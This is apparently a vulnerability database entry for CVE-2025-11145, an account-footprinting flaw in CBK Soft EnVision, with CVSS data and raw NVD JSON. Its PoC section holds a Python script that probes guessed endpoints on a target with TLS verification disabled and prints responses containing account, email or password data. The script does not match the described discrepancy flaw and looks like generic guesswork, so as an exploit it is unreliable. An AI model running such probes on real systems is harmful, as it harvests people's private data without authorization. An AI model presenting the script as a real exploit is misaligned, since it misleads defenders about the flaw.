Security Vulnerability Report
中文
CVE-2025-11145 CVSS 7.5 HIGH

CVE-2025-11145

Published: 2025-10-24 15:15:38
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Observable Discrepancy, Exposure of Sensitive Information to an Unauthorized Actor, Exposure of Private Personal Information to an Unauthorized Actor vulnerability in CBK Soft Software Hardware Electronic Computer Systems Industry and Trade Inc. EnVision allows Account Footprinting.This issue affects enVision: before 250566.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

EnVision < 250566

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11145 PoC - CBK Soft EnVision Account Footprinting # This PoC demonstrates the information disclosure vulnerability import requests import json TARGET_URL = "http://target-envision-system.com" CVE_ID = "CVE-2025-11145" def check_vulnerability(target): """ Check if the target EnVision system is vulnerable to CVE-2025-11145 """ # Common EnVision endpoints that may expose account information endpoints = [ "/api/account/info", "/api/user/profile", "/api/accounts/list", "/admin/userdetails" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Accept": "application/json" } print(f"[*] Testing {CVE_ID} on {target}") for endpoint in endpoints: try: url = f"{target}{endpoint}" response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if sensitive information is exposed if response.status_code == 200: # Look for account-related sensitive data if any(keyword in response.text.lower() for keyword in ['account', 'user', 'email', 'password', 'phone', 'address']): print(f"[!] Potential vulnerability found at {endpoint}") print(f"[+] Response snippet: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("[*] No obvious vulnerability indicators found") return False if __name__ == "__main__": check_vulnerability(TARGET_URL) print("\n[*] Note: This is a demonstration PoC. Verify with official sources.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11145", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:37.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Observable Discrepancy, Exposure of Sensitive Information to an Unauthorized Actor, Exposure of Private Personal Information to an Unauthorized Actor vulnerability in CBK Soft Software Hardware Electronic Computer Systems Industry and Trade Inc. EnVision allows Account Footprinting.This issue affects enVision: before 250566."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-203"}, {"lang": "en", "value": "CWE-359"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0361", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.